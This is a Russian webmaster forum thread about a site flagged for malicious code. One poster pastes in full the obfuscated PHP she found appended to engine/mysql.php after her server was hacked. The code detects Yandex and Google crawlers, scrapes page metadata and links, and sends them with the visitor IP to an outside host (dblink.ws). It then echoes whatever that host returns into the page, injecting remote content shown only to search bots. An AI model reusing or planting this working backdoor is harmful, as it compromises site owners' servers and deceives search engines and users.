В паре с Яндекс вебмастер?

Обычно яша перепроверяет сайты на вредоносные коды раз в 6-12 месяцев (это мои наблюдения), после проверки приходит письмо на поту от вебмастера(ели в настройках включно) недавно и у меня на один из сайтов такое письмо приходило, у меня все в порядке, вирусняка не обнаружено. Скорей всего с Google Analytics это просто совпадение, ищите вирус в другом месте.

У меня вирус просто на компе был.
Вредоносный код был совсем не от аналитика.
А просто вирус в браузере, и попадает либо в опрос на сайте, либо в другие места.
Проверь админку на сайте, на наличие подозрительных кодов.

сама вот только сегодня избавилась от этого кода, а вообще мне 8марта сервак ломанули. Знаю где код сисдит

ищи в папке engine файл mysql php в самом низу файла

хочешь найду?


<? $x2a="\x62\141\163e\066\x34_d\x65c\157d\145"; $x2b="\143o\165\156\x74"; $x2c="\143u\x72\154\137\x69\156\x69t"; $x2d="\143\165\x72\154_\x73\x65\164\157\x70\x74"; $x2e="\143u\162\x6c\x5f\x65\170e\143"; $x2f="curl\137c\x6c\157\163e"; $x30="ex\x70\154\157de"; $x31="\146\143l\157se"; $x32="\x66\x65of"; $x33="\146get\x73"; $x34="f\x69l\145\137\147e\x74_\x63ont\x65nts"; $x35="fs\x6f\x63\x6bop\x65\x6e"; $x36="\x66\165\x6ect\x69\157\156\x5f\x65\170\151\x73t\x73"; $x37="\x66w\x72\x69te"; $x38="\155\x62\137\143\x6f\156v\x65\162t\137en\x63\157\144\x69\x6e\147"; $x39="\x70a\162\163\145_u\162\154"; $x3a="\160reg\137\x72\x65\x70\x6c\141\x63\145"; $x3b="p\x72\x65g\x5fm\x61t\x63\150\137\x61\154\154"; $x3c="\160\x72\145\147_\155\x61t\143\x68"; $x3d="\163\164\162\137\162e\160\154\x61c\145"; $x3e="st\162\151\160\143\163\x6c\141\x73\x68\x65\x73"; $x3f="s\x75\x62\163t\x72"; $x40="st\x72\x70\157\163"; $x41="\163\x74r\x73\164\162"; $x42="\x74\162i\155";
function x0b($x0b,$x0c=false,$x0d=false){ global $x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39,$x3a,$x3b,$x3c,$x3d,$x3e,$x3f,$x40,$x41,$x42; if($x0d){$x0e = $x0b.$x0c;}else{$x0e = $x2a($x0b).$x0c;}$x0f = false;if( @$x36('curl_init') ){ if( $x10 = @$x2c() ){if( !@$x2d($x10,CURLOPT_URL,$x0e) ) return $x0f;if( !@$x2d($x10,CURLOPT_RETURNTRANSFER,true) ) return $x0f;if( !@$x2d($x10,CURLOPT_CONNECTTIMEOUT,30) ) return $x0f;if( !@$x2d($x10,CURLOPT_HEADER,false) ) return $x0f;if( !@$x2d($x10,CURLOPT_ENCODING,"\147zi\x70,\x64\145f\154a\164\145") ) return $x0f;$x0f = @$x2e($x10);@$x2f($x10); }}else{ $x11 = $x39($x0e);if( $x12 = @$x35($x11['host'],!empty($x11['port']) ? $x11['port'] : 80 ) ){ $x13 = 'GET '.$x11['path'] . '?' . $x11['query'] .' HTTP/1.0'. "\r\n"; $x13 .= 'Host: '. $x11['host'] ."\r\n"; $x13 .= 'Connection: Close' . "\r\n\r\n"; @$x37($x12, $x13); $x0f = ''; while( !$x32($x12) ){ $x0f .= @$x33($x12,1024);}$x0f = $x3f($x0f,$x40($x0f,"\r\n\r\n") + 4);@$x31($x12); }}return $x0f;}function x0c($x14){ global $x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39,$x3a,$x3b,$x3c,$x3d,$x3e,$x3f,$x40,$x41,$x42; return $x3d("\r\n","",$x42($x3e($x3a("'<\x5b\x5e>]\x2a>'s\x69",'',$x14))));}function x0d($x15){ global $x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39,$x3a,$x3b,$x3c,$x3d,$x3e,$x3f,$x40,$x41,$x42; $x16 =$x3d("\r\n", "",$x15);$x16 =$x3d("\x20", "\x3a\x3a:\072",$x16);return x0c($x16);}function x0e($x17){ global $x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39,$x3a,$x3b,$x3c,$x3d,$x3e,$x3f,$x40,$x41,$x42; $x3b("'\x3ca\056\x2a\077href=[\"\']\150\164t\160:\/\/(\056*?)\x5b\"\'][^\x3e]\x2a>'\x73\151",$x17,$x18);foreach($x18[1] as $x19){$x1a = $x30("/",$x19);$x1b = $x3a('/^www\./', '', $_SERVER["H\124\124\120\x5f\110\x4f\123T"]);$x1c = $x3a('/^www\./', '', $x1a[0]);if($x1c !== $x1b){$x1d[$x1c] = $x1c;}}return $x2b($x1d);}function x0f($x17){ global $x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39,$x3a,$x3b,$x3c,$x3d,$x3e,$x3f,$x40,$x41,$x42; global $x1e;if($x3b("'\<\x6d\x65\x74a(\x2e\052?\x29\x5b\x5e>\135\x2a\076'\163i",$x17,$x1f)){foreach($x1f[0] as $x20 =>$x19){if($x41($x19,"d\x65\163c\162ip\x74\151\157\156")){$x3c("'c\157\156\164en\x74\x3d\133\"\'\135(\x2e\052\x3f\051[\"\'\x5d'\x73i",$x19,$x1e[0]);}if($x41($x19,"\x6b\145y\167ord\163")){$x3c("'content\075[\"\'\x5d(\x2e\x2a?\x29\133\"\'\135'\x73\x69",$x19,$x1e[1]);}if($x41($x19,"\103\157\156\x74\145\x6e\x74\x2d\x54\171pe") or $x41($x19,"\143\x6f\x6e\x74en\x74-\164\171\160\145")){$x3c("'\143\x68a\x72\163\x65t=\050\x2e\x2a?\051[\"\'\x5d'\x73\151",$x19,$x1e[2]);}}}if($x3c("'\x3c\164\x69\164l\x65\133^>\x5d\x2a\x3e\050\056\x2a\x3f\051\x3c\/\164\151\x74le[\x5e\x3e]\052>'\x73\x69",$x17,$x21)){if($x41($x21[1],'»')) $x3c("'(\x2e\052\077\051\046\162\x61q\x75\x6f;'s\x69",$x21[1],$x1e[3]);else $x1e[3][1] = $x21[1];}} function x10(){ global $x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39,$x3a,$x3b,$x3c,$x3d,$x3e,$x3f,$x40,$x41,$x42; global $x1e;$x22 = $_SERVER["R\x45\x51UE\x53T\x5fU\122\x49"];$x23 = $_SERVER["HT\x54\x50\137\110O\x53\124"];if ( $x41($_SERVER['HTTP_USER_AGENT'], 'Yandex') or $x41($_SERVER['HTTP_USER_AGENT'], 'Google')){print "\074!-\x2d\142\x6f\164_\x74r\165\x65\x2d-\x3e\n";$x17 = x0b('aHR0cDovLw==',$x23.$x22); x0f($x17);$x24 = @$x34(ROOT_DIR.'/templates/'.$x25['skin'].'/main.tpl');$x26 = x0e($x17);$x27 = x0e($x24);$x28 = 'n';if ( $x41($_SERVER['HTTP_USER_AGENT'], 'Yandex')){$x28 = 'y';}elseif( $x41($_SERVER['HTTP_USER_AGENT'], 'Google')){$x28 = 'g';}if($x1e[2][1] == 'UTF-8' or $x1e[2][1] == 'utf-8'){$x1e[3][1] = $x38($x1e[3][1], 'windows-1251', 'UTF-8');$x1e[1][1] = $x38($x1e[1][1], 'windows-1251', 'UTF-8');$x1e[0][1] = $x38($x1e[0][1], 'windows-1251', 'UTF-8');}$x29 = x0b('aHR0cDovLw==','dblink.ws/conect.php?url='.$x22.'&host='.$x23.'&t='.x0d($x1e[3][1]).'&k='.x0d($x1e[1][1]).'&d='.x0d($x1e[0][1]).'&vs='.$x26.'&temp='.$x27.'&hu='.$x28.'&ip='.$_SERVER["\122E\115OT\105\x5fA\104\104\122"]); if($x1e[2][1] == 'UTF-8' or $x1e[2][1] == 'utf-8'){$x29 = $x38($x29, 'UTF-8', 'windows-1251');}echo $x29;}}x10();?>